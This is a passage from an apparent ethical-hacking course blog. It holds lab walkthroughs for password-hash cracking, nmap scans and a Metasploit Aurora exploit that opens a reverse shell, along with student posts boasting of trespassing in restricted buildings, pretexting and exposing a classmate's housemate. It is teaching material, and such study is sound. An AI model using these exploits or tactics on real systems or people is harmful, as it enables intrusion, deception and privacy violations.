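        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"line {n}: expected user:rid:lm:nt")
        user, rid, lm, nt = parts[:4]
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
            raise ValueError(f"line {n}: bad rid or hash field")
        accounts.append(Account(user, int(rid), lm.upper(), nt.upper()))
    return accounts


def audit(accounts):
    """Map user -> list of issues an administrator should act on."""
    findings = {}
    for a in accounts:
        issues = []
        if a.rid == 500:
            issues.append("built-in Administrator (RID 500)")
        if a.empty_password:
            issues.append("empty password")
        elif a.lm_stored:
            issues.append("LM hash stored (legacy, case-insensitive, 7-char halves)")
            if a.max_len_7:
                issues.append("password is at most 7 characters")
        if issues:
            findings[a.user] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{user}: " + "; ".join(issues))
```

On the sample data every account still has an LM hash stored, and User1 through User3 are at most 7 characters long; the remediation those findings point to is disabling LM hash storage and enforcing a minimum password length, which is also why Exercise 3 targets the LM hashes first.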

Exercise 3: Cracking Windows Password Hashes Using John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of *NIX, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. In the rest of this lab, John the Ripper will be referred to as John.  In the following exercise, you will use the command-line version of John to crack the LM password hashes from your target system:

1. Get the password hashes from your target system to your BackTrack system, saving them in /root/ceh, in a file called hashes.txt

2. Change into the directory where John is located (only type what’s in bold):
user1@pentest:~#cd /pentest/passwords/jtr
user1@pentest:~#pwd
/pentest/passwords/jtr

3. Type (only type what’s in bold):
user1@pentest:~#./john /root/ceh/hashes.txt
Syntax breakdown:
./john: program name
/root/ceh/hashes.txt: the password hashes from your target system
Your output will look something like this:
Loaded x password hashes with no different salts (NT LM DES [32/32 BS])
PACHYDE (smendez?e?:1)
RM (smendez?e?:2)
guesses: x time: 0:00:08:23 100% c/s: 9204K trying: ZYUUZOK - ZZZZZZZ

4. In a second BackTrack shell, use the --show option to display the password cracking status (only type what’s in bold):
user1@pentest:~#./john --show /root/ceh/hashes.txt | less

NOTE: you will need to re-run this command multiple times to get the latest information relating to cracked passwords and remaining hashes left to crack

Project 10 - Browser Exploit Using Metasploit

In the following exercise, you will use Metasploit from the BackTrack distribution to deliver an exploit to a vulnerable version of Internet Explorer:

1. From a BackTrack shell, navigate to the Metasploit Framework 3 folder (only type what’s in bold):
user1@pentest:~# cd /pentest/exploits/framework3
user1@pentest:~# pwd
/pentest/exploits/framework3

2. Open the Metasploit Framework console (only type what’s in bold):
user1@pentest:~# ./msfconsole

3. You are now going to set up Metasploit to use the Aurora exploit, made famous in December, 2009, when Chinese hackers launched this malware (and a host of others) against Google and 35 other multinational companies (only type what’s in bold):
msf > use windows/browser/ms10_002_aurora

4. Set the IP address of your BackTrack system, which will run a web server hosting the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > set SRVHOST BackTrack_IP_Address
SRVHOST => BackTrack IP Address

5. Next, set the Meterpreter payload to launch a reverse shell once the victim visits the web server being hosted on your BackTrack system (only type what’s in bold, on one line):
msf exploit (ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

6. Set the following option for the Meterpreter payload (only type what’s in bold):
msf exploit (ms10_002_aurora) > set LHOST BackTrack_IP_Address
LHOST => BackTrack IP Address

7. You are now ready to launch the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > exploit

Your output should look as follows:
[*] Exploit running as background job.
[*] Started reverse handler on BackTrack_IP_Address:4444
[*] Using URL: http://BackTrack_IP_Address:8080/text_string - select and copy the URL that is output here
[*] Server started.
msf exploit (ms10_002_aurora) >

8. Leave this shell open - you will return to it shortly

9. Log into your Victim Windows system

10. Open Internet Explorer

11. Paste the URL from step #7 into the address bar and hit ENTER

12. Switch back to your BackTrack system
You should see the following output:
[*] Sending Internet Explorer “Aurora” Memory Corruption to client Windows_Victim_IP_Address
[*] Sending stage (749056 bytes) to Windows_Victim_IP_Address
[*] Meterpreter session 1 opened (BackTrack_IP_Address:4444 -> Windows_Victim_IP_Address:Port #) at
Day, Date Time
Note: you need to hit ENTER to get your Metasploit shell back

13. Type the following (only type what’s in bold):
msf exploit (ms10_002_aurora) > sessions -i x (where x is the session number in the output in step #12)
[*] Starting interaction with 1…
meterpreter >

14. Open a Windows command shell through the Meterpreter shell

Chapters 11, 12, 13 Homework

Chapter 11 - Activities 11.1 - 11.3
Chapter 12 - Activities 12.2, 12.4, 12.5
Chapter 13 -  Activities 13.1 - 13.3

Screen shots for these are due next Thursday, December 8.




A story about frequency recognition code breaking

The Gold Bug, by Edgar Allan Poe

Final ethics blog post! (Due 12/15)

Please create a NEW POST on the blog of 700-800 words *PRECISELY*. Not longer, not shorter. Make it engaging, analytically sophisticated, and concise.



In your post, you will apply the skills of ethical analysis you've learned to create a piece of writing that contributes to the internet discourse on the ethics of hacking. You are writing for a real audience, and you are contributing to a 21st century debate that is dearly in need of attention from smart people who are skilled in thinking about both hacking and philosophy.



Choose one of the episodes by Michael Sandel on http://www.justiceharvard.org/watch/ I don't recommend the first or last ones; any of the others could work well.



Watch the lecture. :)



Think about the lecture. Generally, Sandel will introduce a political or moral philosopher, like Aristotle, Kant, Rawls, or Locke, and apply the philosopher's ideas to situations.



Those situations will generally not have anything to do with computers. This is a shortcoming in our 21st century world.



You can ameliorate this problem. Apply the ideas in the lecture of your choice--ideas like utilitarianism, rights, moral desert, loyalty, etc.--to a problem or case of your choice in computer hacking. What would John Stuart Mill say about wardriving? What would John Rawls say about jailbreaking? What would John Locke say about replacing the characters in a URL and seeing what you get? What would Immanuel Kant (look, he's not named John!) say about doing that thing where you use web forms to SQLeeze your way into databases?



Don't forget to briefly introduce your philosopher and your hacking idea before you connect them. Readers will happen upon your post via Google, so you want to give them a bit of an introduction so they're not flying blind.



Make sure your ideas are analytically sophisticated--that would go without saying. But ideas are only part of the battle. Don't forget to express your ideas in an attractive and engaging and concise way. Wit, humor, beautiful writing--all these are great ways to engage your readers. Think about your favorite serious bloggers or op-ed--that's the sort of tone you want.

Codebreaking

Find out about codemaking, codebreaking.

Cryptography.

Frequency analysis.

Cipher texts.

Caesarean shifts.

Enigma.

These are words that matter for codebreaking.


Copywrong?

Y'all are hacker-types.

And while hacker-types and pirate-types are definitely not coterminous categories, piracy and hacking are closely connected. The Observant Commuter drew our attention to this several posts back.

Which brings us to the question of copyright.

Books, music, movies, software, drugs--all these can be and are copyrighted.

Does copyright undermine or increase creativity? Does pirated software infringe on property rights? And if so, how so? Does the blame lie with the person who uploaded a file to a torrent site, the person who downloads and benefits from it, or both--and why? Is copyright defensible in theory, but is the 21st century way of doing copyright a step too far? What do you think? Please create a comment on this post, no later than 12/6 at 1:00 PM (AKA Captain Seafoam Green's breakfast hour).


Some things to think with:


A theoretically-sophisticated argument that copyright is not justifiable in its current form:


http://www.tomgpalmer.com/wp-content/uploads/papers/morallyjustified.pdf


Two simpler perspectives on intellectual property:


http://www.stephankinsella.com/wp-content/uploads/publications/InsightMag_com_symp_printable.htm


About piratebay


http://en.wikipedia.org/wiki/The_Pirate_Bay


A movie (one hour long)


Steal This Film

Wednesday, November 30, 2011

Uplink--hacking simulation game

I haven't played it yet, but downloaded it this morning as part of the newest Humble Indie Bundle (set your own price for a pack of independent games that are completely DRM-free)

http://www.introversion.co.uk/uplink/

Thursday, November 24, 2011

Tag

Oooo tie a paisley ribbon on the Dark man's car,
It's been one long game and I keep picking on his car...

Luvs ya,
Ms.M

Movie Night

Ok so I'm a dope.
For those coming to movie night please change the 6 on the invitation to a 16.
Hope to see you all there,
Corey

Monday, November 21, 2011

IMPORTANT REMINDERS!!!

The Chapters 7, 8, 9 and 10 test will be tomorrow (Tuesday, November 22) in class. The test will be based on the content compiled from the presentations given on Thursday. It will include a hands-on component using the virtual environment that will be based on something you had to complete for homework from the chapters.

Also, Project 9 and the Chapters 7, 8, 9 and 10 homework are due tomorrow (Tuesday, November 22). Chapters 7, 8 and 10 are technical screenshots, while Chapter 9 is research-based screenshots.

The class immediately following Thanksgiving break, Tuesday, November 29, will not be held due to Professional Development Day for faculty. We will resume for our final three weeks on Thursday, December 1.

Thursday, November 17, 2011

http://www.youtube.com/watch?NR=1&v=YiBMLp2Ows8

Did you enjoy the Tooth rotting Candy

I hope you enjoyed the free candy, Jolly Ranchers are irresistible. It contained a new formula developed by a secretive group of dentists.

Social Engineering done, get Tooth rotters into the class room and get the majority of people to have at least one.

Wednesday, November 16, 2011

Stop Online Piracy Act....could Stop Online Participation

Essentially, only 'content owners' can post material; by 'content owners' they mean **AA, et al.

Much farther-reaching than the title of the bill lets on.  This could effectively outlaw software like VPN, TOR, etc.  This is scary; China is currently less restrictive.

It seems like if anyone disagrees with anything online, all they would need to do is post a link to torrents or warez on the blog/forum/site.

http://www.itworld.com/security/224681/sopa-sponsors-deride-criticisms-myths

There are many, many more links on this abomination.

Tuesday, November 15, 2011

Project 9: Windows Password Cracking with Cain and Abel

What You Need
A Windows XP machine with administrator access (real or virtual)

Creating Passwords to Crack
1. Click Start, right-click My Computer, and click Manage. In Computer Management, in the left pane, expand the Local Users and Groups container.
2. In the left pane of Computer Management, click the Users container. You should see some accounts in the right pane, as shown below on this page.

Creating Test Accounts
3. In the left pane of Computer Management, right-click Users and click New User.
4. In the New User box, enter a user name of P3 and a password of abc, and click Create. The check boxes in the lower section of the New User box don’t matter, because no one will really be using these accounts.
P1 abcde
P2 123
P4 password

5. Repeat the process to create the three accounts above.

Installing Cain
6. On the virtual machine's desktop, open a browser and go to oxid.it
7. In the upper left, click Projects.
8. Scroll down past the disclaimer and click "Cain & Abel".
9. Scroll down and click "Download Cain & Abel v4.9.25 for Windows NT/2000/XP". (The version number may be higher now.) Save the installer on your desktop.
10. Double-click the installer. Install the software with the default options. It will install WinPCap as well as Cain & Abel.

Installing Abel
11. Cain is the password cracker, and Abel is the process that harvests the hashed passwords from the Windows machine. You normally install Abel on the target machine, but we'll just install it locally.
12. Click Start, Programs, Accessories, Command Prompt.
13. Type in the following command and press the Enter key:
copy \"program files"\cain\abel.exe \Windows
This command copies the Abel installer to the C:\Windows folder.
14. Type in the following command and press the Enter key:
copy \"program files"\cain\abel.dll \Windows
This command copies the Abel DLL file to the C:\Windows folder. This file is the actual service.
15. Type in the following command and press the Enter key:
cd \Windows
This command changes the working directory to C:\Windows.
16. Type in the following command and press the Enter key:
abel
This command installs the Abel service. A box pops up saying "Abel service has been installed successfully!" Click OK.
17. Type in the following command and press the Enter key:
services.msc
18. The Services window appears. At the top of the right pane, right-click Abel and click Start. In the top line of the right pane, you should see the Abel service with a Status of Started, as shown below on this page.

Finding your Computer's IP Address
19. Click Start, Run. Type in CMD and press Enter. In the Command Prompt window, type IPCONFIG and press Enter. Find your IP address.

Collecting Password Hashes With Cain
20. Double-click the Cain icon on the desktop. Click the Cracker tab.
21. In the center of the window, right-click and click "Add to list".
22. In the "Add NT Hashes from" box, click Next.
   
Cracking Passwords
24. In the right pane, right-click P3, point to "Brute-Force Attack", and click "NTLM Hashes", as shown below on this page. Note: we are cracking the NTLM hashes, not the old, weak LM hashes. The NTLM hashes are much more difficult to crack, so it will only work for short passwords.
25. In the "Brute-Force Attack" box, click the Start button. It should find the three-letter password immediately. Close the "Brute-Force Attack" box.
26. In the right pane, right-click P5, point to "Brute-Force Attack", and click "NTLM Hashes".
27. In the "Brute-Force Attack" box, click the Start button. It should find the five-letter password within a few seconds. Close the "Brute-Force Attack" box.
28. In the right pane, right-click P7, point to "Brute-Force Attack", and click "NTLM Hashes".
29. In the "Brute-Force Attack" box, click the Start button. The seven-letter password is hard to crack, however: no answer appears immediately. It might take a long time to crack, so we'll give up. Click the Stop button. Click the Exit button.
30. You should see the two passwords you found, abc and abcde, in the NT Password column of the Cain window.

Saving the Screen Image
31. Press the PrntScn key to copy the whole screen to the clipboard. Open Paint and paste in the image. Save it as a JPEG, with the filename Your Name Proj 9.

Turning in your Project
32. Email the JPEG image to me as an attachment.
33. This is due Tuesday, November 29.

Chapter 7, 8, 9 and 10 Test

The test on these 4 chapters will be next Tuesday, November 22. The content of the exam will be based on the concepts you presented in class this Thursday, November 17. The exam will include a hands-on component using the virtual environment similar to the homework exercises from the chapters.

Chapter 9 and 10 Homework

Chapter 9 and 10 Exercises from the book are due next Tuesday, November 22. 

On Thursday (11/17)

THE PLAN!

Comrade Crimson, Ms. Magenta, and Captain Seafoam Green will present on Chapter 7
Midnight Lover will present on chapter 8
General Angry Red and Professor Purple will present on chapter 9
Dr. Ultraviolet and Mustache Man will present on chapter 10.

You have 10-15 minutes PER CHAPTER to present. You are, effectively, teaching the chapter. Like professors, you need to choose what you think are the most important ideas in the chapter, and find an ENGAGING way to convey them to your classmates. DO NOT BE BORING. Also, make sure you choose not just the ideas you happen to find most interesting (alas, teaching isn't just about the stuff the teacher thinks is coolest), but the most FUNDAMENTAL ideas in the chapter.

(edited due to paranoia.)

Anyone hungry?

Food has been smuggled in. To get a full size box of cookies in, I placed in between two textbooks. (even though it was in a grocery bag I was not stopped at the gates).

Lock UN-picked

After many hours of frustration, I was unable to pick a Master lock (belonging to me).

It's the effort that counts.


http://packetstormsecurity.org/news/view/20175/US-Anti-Hacking-Law-Turns-Computer-Users-Into-Criminals.html

Friday, November 11, 2011

Payback's a BITCH


Angry Red, you were paid your due, but I sent a message to tag along. Task-get a note into your wallet. :)

Thursday, November 10, 2011

TED Talk - Gaming/Problem Solving As Learning

http://www.ted.com/talks/jane_mcgonigal_gaming_can_make_a_better_world.html

Pics of Whiteboard from Discussion Last Week

Who has these?  Can you please create a unique post with them soon?  Thanks!!!

Backtrack Machine Character Repeat Fix Courtesy of Professor Jefferson Fernandez!

At the BT computer:
in the konsole shell before entering the GUI use the command:

xset r off

This will turn off the auto-repeat!!!!
then
startx to start the GUI

Thanks Professor Fernandez!

Chapter 8 Homework

Complete Exercises 8-1, 8-2, 8-3, 8-4, 8-5 from the textbook. These are due next Tuesday, November 15. Assignments 8-1 and 8-2 can be completed on any PC with Windows. Assignments 8-3, 8-4, 8-5 must be completed in the virtual environment. Submit screenshots for credit! Good luck!



this reminded me of our current chapter :)

Tuesday, November 8, 2011

I NEED POINTS!!

Ok, Ms Magenta has been trying to figure out what is wrong with his computer. It does seem to respond, the icons do not respond...oh dear...help help.

You have been trying to figure it out for the past week and still no luck. I have now spread my simple tactic to my computer and soon it will spread throughout the whole class until I get some points. Give me the points I so rightfully deserve which has baffled you for the past week!!

Cookie

Oh Dark one, here's a cookie for you.
Right in your bag where I talked Crimson into placing it :)
Smoochies,
M

General Angry Red and Mustache Man

We have both successfully blocked an evil and dire plot from Midnight Lover to break a dollar for him. The world is now safe due to the valiant and heroic efforts of General Angry Red and Mustache Man.

Hacktivism!

Your textbook focuses on one kind of "ethical hacking," hacking for hire, with permission from the company or organization that commissioned the hack. But there's another possible kind of ethical hacking. As we discussed last Thursday, some hackers use their powers--they think--for good. They attack sites with purposes that they deem morally wrong, such as child pornography sites. The Jester and Anonymous both do this sort of hacking, as do many other hackers. These hacks are not morally neutral; they are possessed of moral intention.

Find a news article, blog post, or other indication of a SPECIFIC hack with a moral intention. Post a comment on this post:
-linking to the news article/blog post/tweet/whatever
-explaining the hack (what did they do? when?)
-introducing the target (who did they hack?)
-excavating the moral intention (why did they hack it? Try to find communication *from* the hacker or hacker group saying why they did it; if not, try to speculate about their motives and come up with an argument for why it was legitimate for the hacker to hack this site.)

Email me if you have questions-- profpoole at gmail dot com. Please post this by Thursday at 9:00 AM. Yes, THIS THURSDAY, 11/10.

And the answer is....

The answer to the bonus question from the last test appears in Chapter 8!  Hmmm, interesting that I would ask a question that is later answered in your book.  Did anyone think to consult the book?  :)

Monday, November 7, 2011

Cake


Did I remember to upload this pic from my task of bringing in something for everyone to eat?
Here it is.
Magenta

Mail Call

[photo deleted]
Crimson, I said I'd watch your bag so I watched your computer at the sametime.
Oh this one was a pic of someone's email.
HUGS
Magenta

Little Red Soup Can


Oh mister dark one...
Could this be yours?
Shame my Magenta Rules sign didn't show.
This of course was a pic of one of the other game players cars with the license plate.
Ta ta love...

2600

http://www.2600.com

Good magazine, and website of interest. Check it out if you have not already.

And the Leader is....

Player                  Points Earned This Week   Points Lost This Week   Total Points Earned
Captain Seafoam Green   10                        0                       10
Comrade Crimson         9                         -2                      7
Ms. Magenta             9                         -4                      5

Thursday, November 3, 2011

Calc1 or was it Stats1

Who was I talking to one night after class about one of those classes, I have to register for next semester.

Arrgh! you salty sea biscuits

Avast! Cpt. Seafoam Green strikes again

Mission: attach a piece of ribbon to a landlubber key-chain.

Action taken:
I attached the ribbon to his key-chain which was attached to his belt loop. He didn't notice and
I even took a photo with the flash on, which also went unnoticed. Not sure of his handle so I will call him mustache man.

See link for proof http://i.imgur.com/TDUQm.jpg



button button, who's got the button?

wow, a 2-fer day. Gotchya, Ultraviolet.

It's only pink, even though I'd rather it say "Don't Panic!!"

post-it punk'd

gotchya. :D


EDIT: Actually, I got TWO fellow players! The first was S (unsure of game-name). I'll reveal the second target only if it garners extra points :)...folks, be careful when I bait you. Playing/offering to be a target can be a ruse.

Love y'all!

BTW, I've been trying to be fair and not targeting anyone more than once. Just sayin'. :D

task - post it in someone's book, 1st page of chapter 7.

Logical Fallacies

http://www.logicalfallacies.info/

Wednesday, November 2, 2011

Access?

Mission: get access to someplace you are not supposed to be.

One of the T fare-collection stalls at Harvard Square was unlocked with an open door, so I just poked my head in briefly (sadly no photos, the Info kiosk had a direct sight line to the room and I didn't want to get caught exiting). The contents of the room looked to be a good deal of computer gear, probably the station camera feeds. I probably could have gotten further had I not been carrying a bunch of crap.

As such, I don't know if it warrants pointage, although I do have a few other targets in mind.

Paperclipped

Mission: put something harmless in a fellow player's pocket/bag. From two weeks ago, so I do not know if I still get the points.

I believe I managed to put a dog-bone paperclip into Midnight Lover's bag (it was then found and apparently removed as someone else found it on a keyboard).

Tuesday, November 1, 2011

Cloth for Magenta

Placed cloth in your wallet....time to cut up those credit cards :)

Harvard Hack

Please read the article in the link, along with looking into what Anonymous and the Jester have done as Hacktivists for the continuation of our discussion on Thursday. 
http://www.ethicsinbusiness.net/case-studies/hacking-into-harvard/

you've been FORKED

my challenge from last week...

You've been forked, O!!

<3

Yeah, you were right, I was up to no good :)

my task was to get a plastic fork into his bag.

Sunday, October 30, 2011

The Game

So I hope everyone liked the food I smuggled into the lab since that was the challenge I drew.
If you want the recipes for any of the components of that dish let me know.
Till then ta my darlings,
Magenta

Thursday, October 27, 2011

Chapter 7

Please read Chapter 7 and do Activities 7-2, 7-4, 7-5 for Tuesday, November 1.  Please email a screen shot or two for each one by Tuesday BEFORE class starts.

Tuesday, October 25, 2011

Access to a restricted area.


I originally posted this as a comment, so this is the cut and paste. I accomplished it immediately following last Thursday's class. My task was, basically, to gain access to a restricted area.

I immediately figured I would use the fact that all summer I have been a regular fixture at some of the behavioral labs at MIT, taking part in various studies as a subject. The last one I did ended in September. I had no specific plan of where to end up. Yet, the door was locked today. I lurked a bit and was rewarded - out came an academic, and in I went. Nobody was in the locked lab. A janitor was wheeling down the hall, talking on the phone. I followed him through a locked door and....found myself in the basement! I wandered a bit. It went under several buildings. I passed a number of grad students walking through with data that they were poring over, wearing badges, so I took out my badge holder (with my T pass and bank card and BHCC ID in it), and let it dangle from my necklace. Professor types passed me as well, and this time I was acknowledged - but not questioned. Various janitors walked past me. They even saw me taking pictures, but said nothing. I wandered into the front area of an occupied mail room, and snapped some pics (mind you, packages in reach that I could easily have taken or messed with if I had been malicious)...I wandered out to the shipping and receiving bay, and there was the ONLY place that I was stopped and sent back...I claimed I couldn't find the mailroom and was shown the way. I took pics of various piles of junk, like stripped computers, in a few side areas, and some creepy basement corners. Eventually I wandered out of a totally different building than I entered, apparently one of the clinical research areas. I also wandered out WITH someone...I had started a conversation with a random person walking by when it seemed I was spotted by security after all, about the book he was carrying (The Chomsky-Foucault Debate: On Human Nature, for the curious)...and made a show of gestures that might be mistaken for familiarity from a distance, and it worked. I walked out with the gentleman.

One thing that seemed very, very common - many, many people were on phones. Mostly using it visually - texts and data - only two people chatting (shipping dock guy and janitor). This made it VERY EASY to do this task.

here are the pictures! Nothing more than quick snaps, some are blurry, but you get the idea. :)


https://plus.google.com/photos/115946097789758291346/albums/5665928144813762033

Ultimate Failure

Ms. Magenta has caused a failure due to forgetfulness/laziness.

Midnight Lover you have successfully avoided an evil hyper complex and specific plot to give to you an item of sure death and destruction, AN M&M COOKIE GIVEN TO YOU BY SOMEONE OTHER THAN ME.

My first adventure

Ok ok so it was an easy one, all I had to do was to get someone to bring me a treat, something everyone should be doing anyways. Crimson was so sweet to smuggle some M&M's into the lab for me while one of the judges were watching and almost gave me away, shame on you! Although I didn't get much of the work done I told Crimson I was doing to get her to fetch and carry for me I was able to later chat up one of the labdrones and got the number 3 pc fixed a bit faster :)
That's all for me for today I still have papers to write, software to code, and maybe a cake to bake.
Ta Darlings!

Find out the name (first & last) of a person a fellow player lives with.

Target: Ms Magenta
A**x Rock

The Game

What, no posts of hacks in the game?  Was everyone simply too busy to try to win hack points this weekend?  Don't forget your hacks expire at the beginning of class today and you will be able to select new ones. 

Thursday, October 20, 2011

Wednesday, October 19, 2011

Tuesday, October 18, 2011

The Game is a Foot...

Or it will be Thursday but we still need a name so post it here.

Chapter 6 Homework

Please complete all the exercises from the textbook from Chapter 6 and submit screen shots demonstrating the work by next Tuesday, October 25.  For most, if not all, of the exercises you will need to use the virtual environment to complete the work.  Make sure to schedule yourself a lab session and get to work!

Sunday, October 16, 2011

Hacking and Voting Machines

http://www.thenewamerican.com/usnews/politics/9330-electronic-voting-machines-proven-vulnerable-to-hacking

A friend sent me this link. He threw this at me as an idea for a potential "group project" (I'm not sure in what manner this could be explored, exactly, but I'm intrigued), and to check out the embedded blue links in the texts. Also, he sent the fixed URL for the video link on the page that was broken -

http://www.youtube.com/embed/6ClrHPShljM

Saturday, October 15, 2011

Security researcher sued for disclosing flaw

An interesting article I found about a security researcher in Australia who did find and disclose a vulnerability, but the company is claiming he ran afoul of a computer crimes act.

http://www.scmagazine.com.au/News/276780,security-researcher-threatened-with-vulnerability-repair-bill.aspx

Illustrates the need for security professionals to not only know their laws, but to ask before doing any testing and have a contract in writing.  Although I think the company should be grateful that he found it and not a malicious hacker...the actual 'test' didn't involve anything particularly complex.

Cell Phone Hack Technique

http://youtu.be/zaxYmm0XwTQ

A fairly simple way to bypass the need for passwords with some cell phone voicemail accounts.

...mostly, I posted this because this shows something fairly invasive and that might lead to more data. This can be done if anyone managed a simple social engineering feat that results in a phone number. I showed this video to a friend who was having a chuckle when I was telling her of our Social Engineering assignments, and she commented "Seriously, how much damage can be done if you just get a phone number? People give those out everyday."

Well, there you go.

Friday, October 14, 2011

SEAN? Anyone?

I'm missing something? Or do I have brain damage, or something... I'm still having issues with the assignments, I haven't gotten past the ping sweep! Sean, if you can give me that run through again? And checking one more time, in case I'm confused...these are done on the virtual environment, yes? Man, I am feeling a bit stupid here, but I'm not going to move along faster if I don't ask for help, so I am. I'm flailing. I keep getting this error, so I'm sure I'm messing up the IP range, syntax, SOMETHING.

Thanks. :/

Wednesday, October 12, 2011

Tuesday's challenges!

On Tuesday, I gave each one of you an individual social engineering challenge.

Post the results of your attempt to conquer your challenge here, by noon on Thursday!

Remember, you all also had to do the "Eight ball in the corner pocket" challenge of getting someone to go somewhere of your choice...i.e. to sit somewhere, or, in Orlando's modification, to park somewhere!

We'll talk about both in class on Thursday!

More social engineering fun (post-Thursday)

All right, team! I don't know what you've done yet in response to Tuesday's challenges, but here's something I want you to try.

Get someone you don't know to ASK, face to face (Karl..), for your phone number, email address, etc. Don't just give it to them outright, make them ask for it. You can make them work really hard for it if you want to, or you can give them a really lovely primrose path, (i.e. "We should stay in touch! ")

Everybody has to try. Who's going to be the first one to conquer this one? Comment!


Social Engineering tactics homework

1.
Eight ball in MY preferred corner pocket...too easy! Sat in the computer lab area outside our class, I was in between two empty seats, girl walks up and tried to sit to my right. I told her there was a virus on that PC, so she sat to my left.


2.
Construction going on around my building, I walked through my alleyway and noticed a construction truck with the driver parked on a private parking spot. I told him that I owned the spot (which I don't) and kindly requested him to move. He agreed and did so.

Tuesday, October 11, 2011

Hypnosis and Social Engineering

An interesting post I found just now on The Ethical Hacker Network (great website overall) about how hypnosis doesn't work as well for social engineering as one might be led to think.

http://www.ethicalhacker.net/content/view/366/24/

Eight Ball in the Corner Pocket

Right so done with that one :)

Project 8 - Decoy Scan


Decoy Scan Using nmap

Exercise 1: in this exercise, you’ll use nmap to perform a decoy scan, which mixes
your IP address with bogus IP addresses (using the -D option):

1. From a BackTrack shell, type the following (only type what's in bold, on one line):
user1@pentest:~#nmap -n -D192.168.1.5,10.5.1.2,me,172.1.2.4 target_IP_address > /root/ceh/decoy_scan

Syntax breakdown:
nmap: program name
-n: program option to never resolve DNS names
-D192.168.1.5,10.5.1.2,me,172.1.2.4: program option to cloak your scan with the supplied decoy addresses; the probes appear to come from every address in the list, with your real address placed where you put me (if me is left out, nmap puts it at a random position). Pick decoys that are actually up: a decoy that never answers the target's SYN/ACKs leaves half-open connections behind, which amounts to a SYN flood. Decoys only hide your address from a casual log reader; active techniques such as router path tracing can still reveal the real source, and decoys do not work with connect scans (-sT) or version detection.
target_IP_address: the IP address of the target system
> /root/ceh/decoy_scan: redirect the output to a file called decoy_scan in the /root/ceh directory

2. Examine your results:
user1@pentest:~#cat /root/ceh/decoy_scan | less


3.  Email your results to proflheureux@gmail.com.

Project 7 - Port Scanning Using TCP


TCP SYN Scan Using nmap


Let's build on this common port scan so that your actions are stealthier.


In the next example, you will add two additional options, -g and -p:
The -g option (the same as --source-port) specifies the source port on the scanning machine (your system). The most common choice is port 80, because many simple packet filters let anything that looks like return traffic from a web server through. Note that this only helps against stateless filters that trust traffic by source port; a stateful firewall is not fooled, and nmap cannot honor -g where the OS stack makes the connection, such as a connect scan (-sT) or version detection. The -p option sets the ports on the target system to scan.


Exercise 1: TCP SYN scan:


1. With the -sS option, your system sends the target a SYN packet. If the target answers with SYN/ACK, the port is open; instead of sending the ACK that would complete the 3-way handshake, your system sends a RST and tears the half-open connection down (which is why this is also called a half-open scan, and why many applications never log it: the connection is never fully established). If the target answers with RST (RST/ACK), the port is closed: there is no process listening for connections on it. If nothing comes back after retries, or an ICMP unreachable error arrives, nmap reports the port as filtered.

2. The syntax to perform a TCP SYN scan is (only type what's in bold, on one line):
user1@pentest:~#nmap -sS -vv -g 80 -p 80,88,135,139,389,445 target_IP_address > /root/ceh/syn_scan

Syntax breakdown:
nmap: program name
-sS: program option for TCP SYN scan
-vv: program option for double verbose output
-g 80: program option that specifies the source port on the scanning machine
(your system)
-p 80,88,135,139,389,445: specifies the ports on the target system to scan
target_IP_address: the IP address of the target system
> /root/ceh/syn_scan: redirect the output to a file called syn_scan in the /root/ceh directory


3. Examine your results:
user1@pentest:~#cat /root/ceh/syn_scan | less

4. Record your results:  PORT STATE SERVICE


5. Repeat steps #2-3 using a different target IP address and different destination port numbers


6.  Email your results to proflheureux@gmail.com.



Project 6 - Port Scanning Using UDP


UDP Scan Using nmap

In this lab, you will use the nmap -sU option to perform a UDP scan.


With this scan type, nmap sends an empty UDP datagram to each target port (for a few well-known ports it sends a protocol-specific payload instead, since a service such as DNS will not answer an empty packet). An ICMPv4 Destination Unreachable/Port Unreachable (Type 3, Code 3) reply means the port is closed; a UDP reply means it is open; other ICMP unreachable codes (Type 3, codes 1, 2, 9, 10 or 13) mark it filtered; and no reply at all is reported as open|filtered, because from the scanner's side a silent open service and a dropped probe look the same.


One major problem with this technique is that when a firewall drops the outgoing ICMPv4 Type 3, Code 3 messages, closed ports look exactly like open ones and are all reported open|filtered. To resolve the ambiguity, run version detection as well (-sU -sV) so nmap sends real protocol requests to those ports, or add --reason to see what each verdict was based on.


Another disadvantage of UDP scanning is speed. Many OSes rate-limit ICMPv4 Type 3, Code 3 messages (the Linux kernel allows about one per second), so a full 65,535-port scan of such a host can take hours. nmap detects the rate limiting and slows itself down to match it rather than flooding the network with probes that cannot be answered.


NOTE: Microsoft OSes do not rate-limit ICMPv4 Type 3, Code 3 error generation, so all 65,535 UDP ports on a Windows machine can be scanned in very little time.

Exercise 1:

1. From a BackTrack shell, type the following (only type what's in bold):
user1@pentest:~# nmap -sU -v target_IP_address > /root/ceh/udpscan
Syntax breakdown:
nmap: program name
-sU: program option for UDP scan
-v: verbose mode
target_IP_address: the IP address of the target system
> /root/ceh/udpscan: redirect the output to a file called udpscan in the /root/ceh directory


2. Examine your results:
user1@pentest:~#cat /root/ceh/udpscan | less


3. Repeat steps #1-2 using different target IP addresses. Compare your results.


4.  Email your results to proflheureux@gmail.com.
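Both the SYN-scan and the UDP-scan exercises above end with you staring at a file of nmap normal output and copying PORT STATE SERVICE rows into your report. The script below, an added example that is not part of the course labs, parses that port table out of a saved output file, counts ports per state, and flags the UDP ports left in the open|filtered limbo described above so you know which ones to re-check with -sV. The two sample outputs embedded in it are constructed for this example; point parse_port_table() at the contents of /root/ceh/syn_scan or /root/ceh/udpscan to use it on real results.

```python
# Added example (not part of the course labs): parse the port table out of the
# nmap normal output that the SYN- and UDP-scan exercises redirect into files
# such as /root/ceh/syn_scan and /root/ceh/udpscan, summarise it per state, and
# flag UDP ports whose open|filtered state still needs a follow-up probe.
# The two sample outputs below are constructed for this example.
import re
from collections import Counter

# One row of nmap's port table, e.g. "445/tcp  open   microsoft-ds".
# Combined states are listed first so "open|filtered" is not split into
# state "open" plus service "|filtered".
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+"
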